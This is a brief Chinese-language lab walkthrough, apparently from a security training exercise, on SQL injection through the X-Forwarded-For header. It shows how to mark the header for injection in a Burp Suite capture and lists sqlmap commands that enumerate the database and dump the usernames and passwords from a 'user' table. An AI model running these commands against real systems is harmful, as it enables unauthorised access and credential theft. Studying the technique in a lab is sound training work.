X-Forwarded-For注入漏洞实战

准备工具

Burp suite

Sqlmap

实训目标

1、掌握SQL注入的基本原理；
2、了解服务器获取客户端IP的方式；
3、了解SQL注入的工具使用；

 

 

 

解题方向

对登录表单的各参数进行测试，找到SQL注入点，对数据库内容进行读取，找到账号与密码。

 

 

 

操作步骤

1.首先打开burp抓包,开启代理，代理开启点击登陆 抓取数据

 

 

 

 

2.将抓取到的数据发送到Repeater

 

 

 

添加x-forwarded-for:*  

 

 

 

 

将raw的信息存为txt文件，如下图所示

 

 

 

 

使用Sqlmap

爆出当前的数据库

　　　　sqlmap -r 1.txt --current-db --batch

爆表名

　　　　sqlmap -r 1.txt -D webcalendar -T user --columns --batch

爆表中的字段

　　　　sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump --batch

 

爆破出后台账号密码

 

 

 

登陆后台获得Key